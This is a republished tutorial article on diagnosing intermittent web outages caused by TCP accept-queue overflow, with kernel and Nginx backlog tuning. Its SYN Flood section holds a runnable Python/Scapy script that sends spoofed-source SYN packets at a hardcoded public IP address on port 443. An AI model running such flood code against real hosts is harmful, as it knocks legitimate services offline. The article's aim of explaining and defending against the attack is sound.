Why Your E‑commerce Site Faces Intermittent Outages: Diagnosing SYN Socket Overflow and TCP Handshake Failures
The article walks through a real‑world case where an e‑commerce homepage intermittently became unreachable, explains how SYN socket overflow and full accept queues cause TCP handshake failures, demonstrates kernel and Nginx tuning, and provides Python scripts for load testing and SYN‑Flood simulation.
Problem Description
Monitoring detected intermittent inaccessibility of the e‑commerce homepage and other pages. System load, security, and network traffic appeared normal, and a reboot temporarily resolved the issue, which later recurred.
Initial Diagnosis
Check device and NIC layers for errors and drops using cat /proc/net/dev and ifconfig.
Observe socket overflow and dropped sockets with netstat -s | grep -i listen.
Deep Analysis
TCP three‑way handshake steps are described. The accept (full‑connection) queue was overflowing, causing the server to drop ACKs when the queue was full. The kernel parameter tcp_abort_on_overflow was 0, meaning the server silently discards the third handshake packet.
Changing tcp_abort_on_overflow to 1 forces the server to send a reset, which was observed in web logs as “connection reset by peer”.
Kernel and Nginx backlog parameters were tuned:
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = 16384
net.core.somaxconn = 16384
nginx backlog = 32768
After adjustments, ss -lnt showed the listen queue size matching the new limits, and load testing with a Python multithreaded script showed no further issues.
TCP Handshake and Queue Mechanics
During the handshake, the SYN is placed in the SYN queue; after the server replies with SYN‑ACK, the ACK moves the connection to the accept queue. If the accept queue is full and tcp_abort_on_overflow is 0, the server retries SYN‑ACK, leading to client time‑outs.
SYN Flood Attack
A SYN flood exploits the half‑open connection state, filling the SYN queue and exhausting resources, preventing legitimate connections. Example Python/Scapy code demonstrates generating massive SYN packets.
from concurrent.futures import ThreadPoolExecutor
from scapy.all import *
def synFlood(tgt,dPort):
srcList = ['11.1.1.2','22.1.1.102','33.1.1.2','125.130.5.199']
for sPort in range(1024,65535):
index = random.randrange(4)
ipLayer = IP(src=srcList[index], dst=tgt)
tcpLayer = TCP(sport=sPort, dport=dPort, flags='S')
packet = ipLayer/tcpLayer
send(packet)
tgt = '139.196.251.198'
print(tgt)
dPort = 443
with ThreadPoolExecutor(10000000) as ex:
try:
ex.submit(synFlood, tgt, dPort)
except Exception as err:
print('return error msg:' + str(err))Understanding and monitoring both SYN and accept queues is critical, especially for short‑lived connections.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
MaGe Linux Operations
Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.